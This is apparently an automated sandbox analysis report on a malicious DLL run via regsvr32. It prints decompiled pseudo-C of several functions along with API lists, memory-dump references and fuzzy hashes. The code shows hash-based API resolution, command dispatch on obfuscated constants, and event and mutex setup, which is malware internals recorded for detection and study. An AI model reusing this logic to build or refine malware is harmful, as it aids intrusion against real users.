                  				_t160 =  *((intOrPtr*)(_t216 + 0x30)) + ( *((intOrPtr*)( *0x8000d4a0 + 8)) +  *((intOrPtr*)( *0x8000d4a0 + 8))) * 0x23c34600;
                  				 *((long long*)(_t216 + 0x30)) = _t160;
                  				 *((long long*)(_t209 + 0x30)) = _t160;
                  				LeaveCriticalSection(??);
                  				goto 0x800090f3;
                  				goto 0x80008f6a;
                  				return 1;
                  			}





























                  0x180008d78
                  0x180008d7b
                  0x180008d7f
                  0x180008d8e
                  0x180008d99
                  0x180008daa
                  0x180008dbe
                  0x180008dca
                  0x180008ddc
                  0x180008de0
                  0x180008de3
                  0x180008deb
                  0x180008df3
                  0x180008e09
                  0x180008e0e
                  0x180008e14
                  0x180008e1a
                  0x180008e29
                  0x180008e35
                  0x180008e3f
                  0x180008e44
                  0x180008e46
                  0x180008e49
                  0x180008e4e
                  0x180008e53
                  0x180008e5c
                  0x180008e63
                  0x180008e63
                  0x180008e6b
                  0x180008e79
                  0x180008e7e
                  0x180008e85
                  0x180008e8a
                  0x180008e8c
                  0x180008e8f
                  0x180008e93
                  0x180008e97
                  0x180008e9e
                  0x180008ea0
                  0x180008ea3
                  0x180008ea9
                  0x180008eae
                  0x180008eb3
                  0x180008eb5
                  0x180008eba
                  0x180008ec3
                  0x180008eca
                  0x180008ed8
                  0x180008ee6
                  0x180008ef3
                  0x180008ef7
                  0x180008efb
                  0x180008f03
                  0x180008f05
                  0x180008f09
                  0x180008f12
                  0x180008f1b
                  0x180008f2a
                  0x180008f38
                  0x180008f4d
                  0x180008f57
                  0x180008f77
                  0x180008f7f
                  0x180008fa5
                  0x180008fba
                  0x180008fbf
                  0x180008fc8
                  0x180008fcc
                  0x180008fd5
                  0x180008ff5
                  0x180008ffa
                  0x180008ffa
                  0x18000900b
                  0x180009013
                  0x180009021
                  0x180009026
                  0x18000902d
                  0x18000903b
                  0x18000903e
                  0x180009048
                  0x180009058
                  0x18000905e
                  0x180009081
                  0x180009099
                  0x1800090a4
                  0x1800090a9
                  0x1800090ad
                  0x1800090b7
                  0x1800090cc
                  0x1800090d3
                  0x1800090d8
                  0x1800090dc
                  0x1800090e2
                  0x1800090e9
                  0x18000910c

                  APIs
                  Memory Dump Source
                  • Source File: 00000003.00000002.701680832.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                  • Associated: 00000003.00000002.701673704.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000003.00000002.701700659.000000018000B000.00000002.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000003.00000002.701706401.000000018000E000.00000002.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_3_2_180000000_regsvr32.jbxd
                  Similarity
                  • API ID: Heap$Free$CriticalLeaveSection$AllocTimelstrlenmemcpy$FileSystemmemset
                  • String ID:
                  • API String ID: 3273538229-0
                  • Opcode ID: fe13ca55ced21057dd33dceaeca19e1809f43a7503c78fa45138f0264a1560c7
                  • Instruction ID: 6b8e83564c84abddb59c8c95e9bb71b7576c070b9c7c9cfbfdeb8062ede7394d
                  • Opcode Fuzzy Hash: fe13ca55ced21057dd33dceaeca19e1809f43a7503c78fa45138f0264a1560c7
                  • Instruction Fuzzy Hash: 65A18032204A8986EBA6DF66E4543DA7791FB8DBC4F48C015EA8D47755DF38C64EC700
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 53%
                  			E00000001180005748(void* __ecx, signed int __edx, signed long long __rbx, void* __rcx, void* __rdx, void* __r8) {
                  				void* __rdi;
                  				void* __rsi;
                  				signed int _t35;
                  				void* _t69;
                  				void* _t80;
                  				char* _t113;
                  				signed long long _t116;
                  				char* _t124;
                  				void* _t142;
                  				void* _t145;
                  				char* _t147;
                  				signed long long _t150;
                  				void* _t152;
                  				void* _t153;
                  				long _t169;
                  				void* _t170;
                  				void* _t172;
                  				void* _t175;
                  
                  				_t116 = __rbx;
                  				 *((long long*)(_t152 + 8)) = __rbx;
                  				 *(_t152 + 0x18) = _t150;
                  				_t153 = _t152 - 0x40;
                  				_t113 =  *0x8000d4a0;
                  				r15d =  *0x8000d498;
                  				_t35 = r15d ^ __edx;
                  				_t146 = __r8;
                  				_t170 = __rcx;
                  				_t4 = _t150 + 1; // 0x1
                  				_t80 = _t4;
                  				if (_t35 == 0x139d2b8d) goto 0x8000588d;
                  				if (_t35 == 0x15f5a8c2) goto 0x80005865;
                  				if (_t35 == 0x2f77acf9) goto 0x8000588b;
                  				if (_t35 == 0x31f2972e) goto 0x80005861;
                  				if (_t35 == 0x48e12436) goto 0x80005965;
                  				if (_t35 == 0x4d382929) goto 0x80005905;
                  				if (_t35 == 0x7f513d6b) goto 0x80005863;
                  				if (_t35 == 0xb016dc39) goto 0x80005852;
                  				if (_t35 == 0xb057dfc9) goto 0x800057e4;
                  				goto 0x800059bb;
                  				if (r9d == 0) goto 0x80005848;
                  				E000000011800024CC(r9d, __rbx, __r8, __r8, _t175);
                  				if (_t113 == 0) goto 0x8000583e;
                  				 *(_t153 + 0x20) =  *(_t153 + 0x20) & _t116;
                  				if (E00000001180002668(_t113, _t116, _t170, 0x180001844, _t146, _t150, _t113,  *((intOrPtr*)(_t153 + 0x90))) != 0) goto 0x8000582b;
                  				goto 0x800059bb;
                  				HeapFree(_t172, _t169, _t142);
                  				goto 0x800059bb;
                  				goto 0x800059bb;
                  				goto 0x800059bb;
                  				SetEvent(_t145);
                  				goto 0x800059bb;
                  				if (r9d == 0) goto 0x80005848;
                  				_t124 = _t113;
                  				E000000011800024CC(r9d, _t116, _t124, _t146);
                  				_t147 = _t113;
                  				if (_t113 == 0) goto 0x8000583e;
                  				if (_t80 + _t80 != 2) goto 0x800058ae;
                  				goto 0x800058c2;
                  				if ( *((intOrPtr*)(_t124 + 0x50)) == 0) goto 0x800058ec;
                  				WaitForSingleObject(??, ??);
                  				asm("sbb ebx, ebx");
                  				goto 0x800058f1;
                  				_t139 =  ==  ? 0x18000543c : 0x180001b7c;
                  				 *(_t153 + 0x20) =  *(_t153 + 0x20) & _t150;
                  				if (E00000001180002668(0x18000543c, _t116, _t170,  ==  ? 0x18000543c : 0x180001b7c, _t147, _t150, _t147,  *((intOrPtr*)(_t153 + 0x90))) == 0) goto 0x80005821;
                  				goto 0x8000582e;
                  				if (_t80 == 0) goto 0x800059bb;
                  				if (0x426 != 0x426) goto 0x800059bb;
                  				if (_t147 == 0) goto 0x8000595f;
                  				if ( *_t147 == 0) goto 0x8000595f;
                  				memset(??, ??, ??);
                  				if (E000000011800020DC(0x18000543c, _t116, _t147, _t153 + 0x30, _t147) != 0) goto 0x8000595d;
                  				if (E000000011800038F8(_t147, _t153 + 0x30, _t153 + 0x78) == 0) goto 0x8000595f;
                  				asm("ror ax, 0x8");
                  				 *((short*)(_t153 + 0x32)) =  *(_t153 + 0x78) & 0x0000ffff;
                  				if (0 != 0) goto 0x800059bb;
                  				if ( *(_t170 + 0x50) == 0) goto 0x8000599a;
                  				 *(_t170 + 0x50) =  *(_t170 + 0x50) & 0x00000000;
                  				E00000001180007950(0,  *((intOrPtr*)( *0x8000d4a0 + 8)),  *(_t170 + 0x50), _t113,  *(_t170 + 0x50), _t150);
                  				HeapFree(??, ??, ??);
                  				goto 0x8000599f;
                  				if (_t80 == 0) goto 0x800059bb;
                  				_t69 = E00000001180001A88( *((intOrPtr*)( *0x8000d4a0 + 8)), _t153 + 0x30, _t113,  *(_t170 + 0x50), _t150,  *((intOrPtr*)(_t170 + 0x38)), _t170 + 0x50);
                  				if ( *((long long*)(_t153 + 0x90)) == 0) goto 0x800059e1;
                  				if (_t69 == 0x3e5) goto 0x800059e1;
                  				r8d = _t69;
                  				E00000001180005600( *((intOrPtr*)( *0x8000d4a0 + 8)), _t170,  *((intOrPtr*)(_t153 + 0x90)), _t150);
                  				return _t69;
                  			}





















                  0x180005748
                  0x180005748
                  0x18000574d
                  0x18000575a
                  0x18000575e
                  0x180005765
                  0x180005777
                  0x180005779
                  0x18000577c
                  0x18000577f
                  0x18000577f
                  0x180005787
                  0x180005792
                  0x18000579d
                  0x1800057a8
                  0x1800057b3
                  0x1800057be
                  0x1800057c9
                  0x1800057d4
                  0x1800057db
                  0x1800057df
                  0x1800057e7
                  0x1800057ef
                  0x1800057fa
                  0x180005804
                  0x18000581f
                  0x180005826
                  0x180005833
                  0x180005839
                  0x180005843
                  0x18000584d
                  0x180005856
                  0x18000585c
                  0x180005868
                  0x18000586d
                  0x180005870
                  0x180005875
                  0x18000587b
                  0x180005880
                  0x180005889
                  0x180005894
                  0x18000589c
                  0x1800058a4
                  0x1800058ac
                  0x1800058be
                  0x1800058ca
                  0x1800058de
                  0x1800058e7
                  0x1800058f3
                  0x1800058ff
                  0x18000590d
                  0x180005912
                  0x180005926
                  0x18000593a
                  0x18000594d
                  0x180005954
                  0x180005958
                  0x180005963
                  0x18000596d
                  0x180005976
                  0x180005983
                  0x180005990
                  0x180005998
                  0x1800059a1
                  0x1800059b9
                  0x1800059c4
                  0x1800059cc
                  0x1800059d6
                  0x1800059dc
                  0x1800059fb

                  APIs
                  • HeapFree.KERNEL32(?,?,?,00000001,00000000,00000000,00000000,00000001800015EA), ref: 0000000180005833
                  • SetEvent.KERNEL32(?,?,?,00000001,00000000,00000000,00000000,00000001800015EA), ref: 0000000180005856
                  • WaitForSingleObject.KERNEL32(?,?,?,00000001,00000000,00000000,00000000,00000001800015EA), ref: 000000018000589C
                  • memset.NTDLL(?,?,?,00000001,00000000,00000000,00000000,00000001800015EA), ref: 0000000180005926
                  • HeapFree.KERNEL32(?,?,?,00000001,00000000,00000000,00000000,00000001800015EA), ref: 0000000180005990
                  Strings
                  Memory Dump Source
                  • Source File: 00000003.00000002.701680832.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                  • Associated: 00000003.00000002.701673704.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000003.00000002.701700659.000000018000B000.00000002.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000003.00000002.701706401.000000018000E000.00000002.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_3_2_180000000_regsvr32.jbxd
                  Similarity
                  • API ID: FreeHeap$EventObjectSingleWaitmemset
                  • String ID: ))8M$6$H$lJu
                  • API String ID: 2222956709-2816507560
                  • Opcode ID: 538479323d73f129c12b3b5a05446ce4d9924ad14fd915045617832929b37bdd
                  • Instruction ID: 785fb66ca69b8b0f02f3e946b07437a251f863b49ae3d9a65a40210c3f307c76
                  • Opcode Fuzzy Hash: 538479323d73f129c12b3b5a05446ce4d9924ad14fd915045617832929b37bdd
                  • Instruction Fuzzy Hash: 9A61B231205B4D86FBE7DA56A4843EB3291A74DBD2F54C026FE895B7D5DE28CA4EC300
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 28%
                  			E00000001180003A24(long long __rbx, long long* __rcx, void* __rdx, long long __rsi, void* __r8, void* __r9) {
                  				void* __rdi;
                  				long _t49;
                  				void* _t54;
                  				void* _t72;
                  				signed long long _t94;
                  				signed long long _t95;
                  				long long* _t97;
                  				int _t112;
                  				void* _t113;
                  				signed long long _t118;
                  				void* _t120;
                  				long long* _t126;
                  				void* _t128;
                  				signed long long _t129;
                  				void* _t131;
                  
                  				 *((long long*)(_t120 + 8)) = __rbx;
                  				 *(_t120 + 0x10) = _t118;
                  				 *((long long*)(_t120 + 0x18)) = __rsi;
                  				_t116 =  *0x8000d4a0;
                  				_t113 = __r9;
                  				_t97 = __rcx;
                  				if (__r9 != 0) goto 0x80003a5b;
                  				goto 0x80003be2;
                  				r8d = 0x10;
                  				memcpy(_t131, _t128, _t112);
                  				InitializeCriticalSection(??);
                  				_t6 = _t97 + 0x88; // 0x88
                  				_t126 = _t6;
                  				 *((long long*)(__rcx + 0xa0)) = 0x180002f24;
                  				_t129 = _t128 | 0xffffffff;
                  				 *((long long*)(__rcx + 0xa8)) = E00000001180007A7C;
                  				r13d = _t129 + 2;
                  				r9d = 0;
                  				r8d = 0;
                  				 *((long long*)(__rcx + 0x98)) = E00000001180008368;
                  				 *((long long*)(__rcx + 0x90)) = _t126;
                  				 *_t126 = _t126;
                  				 *(__rcx + 0x10) = _t129;
                  				CreateEventA(??, ??, ??, ??);
                  				 *((long long*)(__rcx + 0x20)) = E00000001180008368;
                  				if (E00000001180008368 == 0) goto 0x80003bd6;
                  				r9d = 0;
                  				r8d = 0;
                  				CreateEventA(??, ??, ??, ??);
                  				 *((long long*)(__rcx + 0x30)) = E00000001180008368;
                  				if (E00000001180008368 == 0) goto 0x80003bd6;
                  				 *(__rcx + 0x38) =  *(__rcx + 0x38) & _t118;
                  				r8d = 0;
                  				CreateMutexA(??, ??, ??);
                  				 *((long long*)(__rcx + 0x28)) = E00000001180008368;
                  				 *(__rcx + 0x38) = E00000001180008368;
                  				if (E00000001180008368 == 0) goto 0x80003bd6;
                  				E00000001180001C00(0, __rcx, __r9, __r9,  *0x8000d4a0, _t118);
                  				 *_t97 = E00000001180008368;
                  				E0000000118000459C(0x176fdd38, E00000001180008368,  *((intOrPtr*)( *0x8000d4a0 + 0x30)));
                  				_t72 = _t129 + 7;
                  				if (E00000001180008368 == 0) goto 0x80003b4c;
                  				r8d = _t72;
                  				E00000001180008368(_t54, E00000001180008368,  *((intOrPtr*)( *0x8000d4a0 + 0x30)), _t118);
                  				goto 0x80003b4f;
                  				_t94 = _t129;
                  				 *(_t97 + 0x10) = _t94;
                  				if (_t94 != _t129) goto 0x80003bb0;
                  				E0000000118000459C(0xb27f4910, _t94,  *((intOrPtr*)(_t116 + 0x30)));
                  				if (_t94 == 0) goto 0x80003b79;
                  				 *_t94();
                  				goto 0x80003b7b;
                  				if (0 != 0) goto 0x80003bd6;
                  				E0000000118000459C(0x176fdd38, _t94,  *((intOrPtr*)(_t116 + 0x30)));
                  				if (_t94 == 0) goto 0x80003ba4;
                  				r8d = _t72;
                  				 *_t94();
                  				goto 0x80003ba7;
                  				_t95 = _t129;
                  				 *(_t97 + 0x10) = _t95;
                  				if (_t95 == _t129) goto 0x80003bd6;
                  				_t28 = _t97 + 0x18; // 0x18
                  				E00000001180006C8C(2, _t95, _t97, E0000000118000431C, _t97, _t116, _t118, _t28);
                  				 *(_t97 + 8) = _t95;
                  				if (_t95 == 0) goto 0x80003bd6;
                  				SwitchToThread();
                  				goto 0x80003c03;
                  				_t49 = GetLastError();
                  				if (_t49 == 0) goto 0x80003c03;
                  				E00000001180007950(r13d, _t97, _t97, _t113, _t116, _t118);
                  				if (r13d == 0) goto 0x80003c03;
                  				E0000000118000459C(0x9cb92d3f, _t95,  *((intOrPtr*)(_t116 + 0x30)));
                  				if (_t95 == 0) goto 0x80003c03;
                  				 *_t95();
                  				return _t49;
                  			}


















                  0x180003a24
                  0x180003a29
                  0x180003a2e
                  0x180003a3f
                  0x180003a48
                  0x180003a4b
                  0x180003a51
                  0x180003a56
                  0x180003a5f
                  0x180003a65
                  0x180003a6e
                  0x180003a74
                  0x180003a74
                  0x180003a82
                  0x180003a89
                  0x180003a94
                  0x180003aa2
                  0x180003aa7
                  0x180003aaa
                  0x180003ab2
                  0x180003ab9
                  0x180003ac0
                  0x180003ac3
                  0x180003ac7
                  0x180003acd
                  0x180003ad4
                  0x180003ada
                  0x180003add
                  0x180003ae5
                  0x180003aeb
                  0x180003af2
                  0x180003af8
                  0x180003afc
                  0x180003b03
                  0x180003b09
                  0x180003b0d
                  0x180003b14
                  0x180003b1f
                  0x180003b29
                  0x180003b30
                  0x180003b35
                  0x180003b3d
                  0x180003b42
                  0x180003b48
                  0x180003b4a
                  0x180003b4c
                  0x180003b4f
                  0x180003b56
                  0x180003b61
                  0x180003b69
                  0x180003b75
                  0x180003b77
                  0x180003b7d
                  0x180003b8b
                  0x180003b93
                  0x180003b95
                  0x180003ba0
                  0x180003ba2
                  0x180003ba4
                  0x180003ba7
                  0x180003bae
                  0x180003bb0
                  0x180003bbe
                  0x180003bc3
                  0x180003bca
                  0x180003bcc
                  0x180003bd4
                  0x180003bd6
                  0x180003be0
                  0x180003be5
                  0x180003bec
                  0x180003bf7
                  0x180003bff
                  0x180003c01
                  0x180003c21

                  APIs
                  Memory Dump Source
                  • Source File: 00000003.00000002.701680832.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                  • Associated: 00000003.00000002.701673704.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000003.00000002.701700659.000000018000B000.00000002.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000003.00000002.701706401.000000018000E000.00000002.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_3_2_180000000_regsvr32.jbxd
                  Similarity
                  • API ID: CloseCriticalHandleSection$CreateEvent$DeleteEnterErrorFreeHeapInitializeLastLeaveMutexObjectSingleSleepSwitchThreadWaitmemcpy
                  • String ID:
                  • API String ID: 810493412-0
                  • Opcode ID: b816b6a790a3b77e0cb1c9170e0e56660fdfce69cd924edd7d4bea04d9f1c9d6
                  • Instruction ID: da56e0963138b123f8a3a91eab94b9da458cf35c37d31fe2a2e97a6efbfc397b
                  • Opcode Fuzzy Hash: b816b6a790a3b77e0cb1c9170e0e56660fdfce69cd924edd7d4bea04d9f1c9d6
                  • Instruction Fuzzy Hash: 5F51C332301B4882EB97DF22A4117DA73A8FB8CBD8F448524AE5D47795EF38CA09C350
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 54%
                  			E00000001180002B60(void* __esi, long long __rcx, void* __r9, void* __r10, signed long long __r11) {
                  				void* __rbx;
                  				void* __rdi;
                  				void* __rsi;
                  				void* __rbp;
                  				void* _t79;
                  				signed int _t94;
                  				void* _t143;
                  				void* _t144;
                  				long long _t174;
                  				long long* _t175;
                  				long long* _t178;
                  				void* _t180;
                  				long long _t182;
                  				void* _t190;
                  				intOrPtr _t211;
                  				void* _t224;
                  				long long _t225;
                  				long long _t228;
                  				void* _t229;
                  				void* _t255;
                  				signed long long _t256;
                  
                  				_t256 = __r11;
                  				_t255 = __r10;
                  				_t144 = __esi;
                  				_t174 = _t228;
                  				_t229 = _t228 - 0x60;
                  				r12d =  *0x8000d498;
                  				 *(_t174 + 0x20) =  *(_t174 + 0x20) & 0x00000000;
                  				_t225 = __rcx;
                  				if (E00000001180002464(_t174, _t180,  *0x8000d4a0 + 0x28, __rcx) != 0) goto 0x80002bd9;
                  				_t79 = E00000001180002464(_t174, _t180,  *0x8000d4a0 + 0x20, _t225);
                  				if (_t79 == 0) goto 0x80002bd9;
                  				HeapFree(??, ??, ??);
                  				if (_t79 != 0) goto 0x80002f0d;
                  				_t190 = _t229 + 0x48;
                  				if (E00000001180008C60(_t180, _t190, _t224, _t225) != 0) goto 0x80002ed2;
                  				r9d =  *( *((intOrPtr*)(_t225 + 0x40)) + 2) & 0x0000ffff;
                  				if (_t190 - __r9 + 8 <= 0) goto 0x80002c2b;
                  				if ((r12d ^ 0xe49a1e6d) == 0) goto 0x80002c2d;
                  				E00000001180004ED8(r12d ^ 0xe49a1e6d, __r9 +  *((intOrPtr*)(_t225 + 0x40)) + 8);
                  				_t182 = _t174;
                  				goto 0x80002c2d;
                  				if (_t182 == 0) goto 0x80002ec8;
                  				_t21 = _t225 + 0xb0; // 0xb0
                  				 *((long long*)(_t229 + 0x28)) = _t182;
                  				 *(_t229 + 0x20) =  *(_t229 + 0x20) & 0x00000000;
                  				if (E000000011800022AC(_t182, _t174, _t182, _t21,  *((intOrPtr*)(_t229 + 0x48)), _t225,  *0x8000d490,  *((intOrPtr*)(_t225 + 0x30)),  *((intOrPtr*)(_t225 + 0x38))) != 0) goto 0x80002ec8;
                  				_t175 =  *((intOrPtr*)(_t225 + 0x28));
                  				 *((long long*)(_t229 + 0x40)) = _t175;
                  				if (E00000001180002370(r12d ^ 0x61f25585, _t175, _t182, _t256) != 0) goto 0x80002caf;
                  				if (E000000011800038F8( *((intOrPtr*)(_t229 + 0x38)),  *((intOrPtr*)(_t229 + 0x48)), _t229 + 0xa8) == 0) goto 0x80002caf;
                  				goto 0x80002cb8;
                  				 *(_t229 + 0xa8) = 0;
                  				E0000000118000459C(0xab05e147, _t175,  *((intOrPtr*)( *0x8000d4a0 + 0x18)));
                  				r15d = 0x7f;
                  				if (_t175 == 0) goto 0x80002cec;
                  				r9d = 0;
                  				r8d = 0;
                  				 *_t175();
                  				goto 0x80002cef;
                  				if (r15d != 0x102) goto 0x80002ec8;
                  				 *(_t225 + 0x64) = 0x3e8;
                  				if (E00000001180002370(r12d ^ 0x64d094d6, _t175, _t182, _t256) != 0) goto 0x80002d41;
                  				 *(_t229 + 0x20) =  *(_t229 + 0x20) & 0x00000000;
                  				r9d = 0;
                  				E00000001180002668(_t175, _t182, _t225, 0x180001844, _t225,  *0x8000d490,  *((intOrPtr*)(_t229 + 0x38)), _t229 + 0xb0);
                  				if (E00000001180002370(r12d ^ 0xdd4632ba, _t175, _t182, _t256) != 0) goto 0x80002d8f;
                  				if (E000000011800038F8( *((intOrPtr*)(_t229 + 0x38)), 0x180001844, _t229 + 0xa8) == 0) goto 0x80002d8f;
                  				_t94 =  *(_t229 + 0xa8);
                  				if (_t94 == 0) goto 0x80002d8f;
                  				 *(_t225 + 0x64) = _t94 * 0x3e8;
                  				if (E00000001180002370(r12d ^ 0x705ce798, _t175, _t182, _t256) != 0) goto 0x80002dd2;
                  				if (E000000011800038F8( *((intOrPtr*)(_t229 + 0x38)), 0x180001844, _t229 + 0xa8) == 0) goto 0x80002dd2;
                  				goto 0x80002ddb;
                  				 *(_t229 + 0xa8) = 0;
                  				r12d = r12d ^ 0xe5c7ba87;
                  				if (E00000001180002370(r12d, _t175, _t182, _t256) != 0) goto 0x80002e40;
                  				if (E000000011800038F8( *((intOrPtr*)(_t229 + 0x38)), 0x180001844, _t229 + 0xb8) == 0) goto 0x80002e40;
                  				GetSystemTimeAsFileTime(??);
                  				r11d =  *((intOrPtr*)(_t229 + 0xb8));
                  				 *((intOrPtr*)(_t225 + 0x60)) = r11d;
                  				_t178 = _t256 * 0x23c34600 +  *((intOrPtr*)(_t229 + 0x50));
                  				 *((long long*)(_t225 + 0x58)) = _t178;
                  				if (E00000001180007DBC(0, E000000011800038F8( *((intOrPtr*)(_t229 + 0x38)), 0x180001844, _t229 + 0xb8), _t225, _t229 + 0x58, _t229 + 0x30) != 0) goto 0x80002e68;
                  				r8d =  *((intOrPtr*)(_t229 + 0x30));
                  				E0000000118000137C(_t144, _t182, _t225,  *((intOrPtr*)(_t229 + 0x58)), _t255);
                  				E0000000118000459C(0xab05e147, _t178,  *((intOrPtr*)( *0x8000d4a0 + 0x18)));
                  				if (_t178 == 0) goto 0x80002e97;
                  				r8d = 0;
                  				r9d = 0;
                  				r9d = r9d * 0x3e8;
                  				 *_t178();
                  				goto 0x80002e9a;
                  				_t143 = r15d;
                  				if (_t143 != 0) goto 0x80002e40;
                  				if ( *((intOrPtr*)(_t225 + 0x50)) == 0) goto 0x80002ec8;
                  				E00000001180007950(0xab05e147,  *((intOrPtr*)( *0x8000d4a0 + 8)),  *((intOrPtr*)(_t225 + 0x50)), _t224,  *((intOrPtr*)(_t225 + 0x50)),  *0x8000d490);
                  				HeapFree(??, ??, ??);
                  				E00000001180002620();
                  				_t211 =  *0x8000d4a0;
                  				if ( *((intOrPtr*)(_t211 + 0x20)) == 0) goto 0x80002ef8;
                  				HeapFree(??, ??, ??);
                  				if ( *((intOrPtr*)(_t211 + 0x28)) == 0) goto 0x80002f0d;
                  				HeapFree(??, ??, ??);
                  				asm("lock inc ecx");
                  				return _t143;
                  			}
























                  0x180002b60
                  0x180002b60
                  0x180002b60
                  0x180002b60
                  0x180002b6d
                  0x180002b7f
                  0x180002b86
                  0x180002b8a
                  0x180002ba9
                  0x180002bb7
                  0x180002bc0
                  0x180002bd3
                  0x180002bdb
                  0x180002be1
                  0x180002bef
                  0x180002bfc
                  0x180002c11
                  0x180002c1a
                  0x180002c21
                  0x180002c26
                  0x180002c29
                  0x180002c30
                  0x180002c43
                  0x180002c4a
                  0x180002c4f
                  0x180002c5d
                  0x180002c63
                  0x180002c80
                  0x180002c8c
                  0x180002ca4
                  0x180002cad
                  0x180002cb1
                  0x180002cc1
                  0x180002cc6
                  0x180002ccf
                  0x180002ce0
                  0x180002ce3
                  0x180002ce6
                  0x180002cea
                  0x180002cf5
                  0x180002d14
                  0x180002d22
                  0x180002d29
                  0x180002d36
                  0x180002d3c
                  0x180002d61
                  0x180002d79
                  0x180002d7b
                  0x180002d84
                  0x180002d8c
                  0x180002daf
                  0x180002dc7
                  0x180002dd0
                  0x180002dd4
                  0x180002ddb
                  0x180002dfc
                  0x180002e14
                  0x180002e1b
                  0x180002e21
                  0x180002e2c
                  0x180002e37
                  0x180002e3c
                  0x180002e54
                  0x180002e56
                  0x180002e63
                  0x180002e71
                  0x180002e79
                  0x180002e7b
                  0x180002e7e
                  0x180002e8a
                  0x180002e91
                  0x180002e95
                  0x180002e97
                  0x180002e9c
                  0x180002ea5
                  0x180002eb5
                  0x180002ec2
                  0x180002ecd
                  0x180002ed2
                  0x180002ee3
                  0x180002eeb
                  0x180002eff
                  0x180002f07
                  0x180002f0d
                  0x180002f23

                  APIs
                    • Part of subcall function 0000000180002464: LoadLibraryA.KERNELBASE(?,?,?,0000000180008BB4,?,?,00000000,000000018000510D), ref: 0000000180002476
                    • Part of subcall function 0000000180002464: FreeLibrary.KERNEL32(?,?,?,0000000180008BB4,?,?,00000000,000000018000510D), ref: 00000001800024A7
                  • HeapFree.KERNEL32(?,?,?,?,?,?,00000000,00000000), ref: 0000000180002BD3
                  • GetSystemTimeAsFileTime.KERNEL32 ref: 0000000180002E1B
                  • HeapFree.KERNEL32 ref: 0000000180002EC2
                  • HeapFree.KERNEL32(?,?,?,?,?,?,00000000,00000000), ref: 0000000180002EEB
                  • HeapFree.KERNEL32(?,?,?,?,?,?,00000000,00000000), ref: 0000000180002F07
                  Memory Dump Source
                  • Source File: 00000003.00000002.701680832.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                  • Associated: 00000003.00000002.701673704.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000003.00000002.701700659.000000018000B000.00000002.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000003.00000002.701706401.000000018000E000.00000002.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_3_2_180000000_regsvr32.jbxd
                  Similarity
                  • API ID: Free$Heap$LibraryTime$FileLoadSystem
                  • String ID:
                  • API String ID: 1415693639-0
                  • Opcode ID: 5e368ffbea44e81b77d41e8b41b472461b0af584182af94ce1e612372c450cfb
                  • Instruction ID: d455ad72a2173ea311d53c287058b5208197830efbff1c216518b590d8193917
                  • Opcode Fuzzy Hash: 5e368ffbea44e81b77d41e8b41b472461b0af584182af94ce1e612372c450cfb
                  • Instruction Fuzzy Hash: A5A15172204B8996EBA2DB66E4407DA73A5F78D7D4F448022FA4D47A95DF38C64AC700
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000003.00000002.701767052.00007FFA0AE61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFA0AE60000, based on PE: true
                  • Associated: 00000003.00000002.701752677.00007FFA0AE60000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000003.00000002.701778993.00007FFA0AE62000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000003.00000002.701786113.00007FFA0AE63000.00000008.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000003.00000002.701892733.00007FFA0AEE5000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_3_2_7ffa0ae60000_regsvr32.jbxd
                  Similarity
                  • API ID: AttributeConsoleText
                  • String ID: &$($)$+$0$<$@$F$G$P$S$T$U$U$U$V$a$b$f$p
                  • API String ID: 646522457-3871696196
                  • Opcode ID: 9cdcb3ff4fa943342d4f4e675a6d7142e126a27ecaa70f92b8817774fc8ac274
                  • Instruction ID: 9a70db6e7c709f0cfb0e5bdc7e34a8f4cb49fa8ca14756b08d58d11b704696f3
                  • Opcode Fuzzy Hash: 9cdcb3ff4fa943342d4f4e675a6d7142e126a27ecaa70f92b8817774fc8ac274
                  • Instruction Fuzzy Hash: 4551337380C3D1C5F3539374F85832EAE919763388F1485BAE2CD069DAE6ADE148DB12
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000003.00000002.701680832.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                  • Associated: 00000003.00000002.701673704.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000003.00000002.701700659.000000018000B000.00000002.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000003.00000002.701706401.000000018000E000.00000002.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_3_2_180000000_regsvr32.jbxd
                  Similarity
                  • API ID: ErrorFileLast$EventWrite$CloseCodeCreateExitHandleMultipleNamedObjectsPeekPipeProcessReadResetResumeThreadWait
                  • String ID: .RK
                  • API String ID: 1606758550-3354657194
                  • Opcode ID: e535ec2e64825705009bac7a413637230dfc8d2d18d7f6c6a3e224415b496589
